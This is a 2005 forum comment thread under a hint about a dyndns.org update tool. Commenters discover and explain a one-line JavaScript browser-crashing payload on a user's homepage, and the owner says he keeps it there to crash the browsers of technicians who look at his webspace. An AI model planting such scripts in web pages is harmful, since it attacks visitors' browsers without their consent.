Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'A command line tool to update dyndns.org IP info' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
A command line tool to update dyndns.org IP info
Authored by: rmiller021 on Jan 28, '05 11:12:16AM
fixed link

---
Do you think at 900 char system call is a problem? I love embedding applescripts in c++ :)

[ Reply to This | # ]

A command line tool to update dyndns.org IP info
Authored by: mankoff on Jan 28, '05 11:57:23AM
I'm interested in your homepage. If I remove the file to see your homepage, it successfully crashes Safari & FireFox. IE does nothing, just hangs... wget shows this as your homepage:

$ wget http://www.bsu.edu/web/rwmiller/
$ cat index.html
< HTML >
< SCRIPT > a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
Any reason why?

[ Reply to This | # ]
A command line tool to update dyndns.org IP info
Authored by: koncept on Jan 28, '05 04:51:11PM

It creates an infinite loop of arrays with no content. The only purpose is to crash the brower. Stupid trick (and old too).



[ Reply to This | # ]
A command line tool to update dyndns.org IP info
Authored by: rmiller021 on Jan 30, '05 01:45:09AM

I don't host a webpage there. When techs decide to figure out what is being downloaded from my webspace. It is a nice gift for them.

---
Do you think at 900 char system call is a problem? I love embedding applescripts in c++ :)



[ Reply to This | # ]